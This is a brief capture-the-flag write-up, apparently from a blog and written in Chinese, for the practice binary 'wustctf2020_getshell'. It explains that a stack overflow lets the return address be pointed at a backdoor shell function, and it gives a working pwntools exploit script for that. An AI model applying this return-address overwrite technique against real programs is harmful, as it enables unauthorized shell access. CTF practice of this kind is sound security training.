wustctf2020_getshell
- 在
vulnerable函数中存在溢出漏洞 shell函数中已经预留了后门
溢出->跳转到后门函数
1
2
3
4
5
6
7
from pwn import *
context.log_level = 'debug'
elf=ELF('wustctf2020_getshell')
io = process('wustctf2020_getshell')
payload = b'A'*(0x18+0x4)+p32(elf.sym['shell'])
io.sendline(payload)
io.interactive()
This post is licensed under CC BY 4.0 by the author.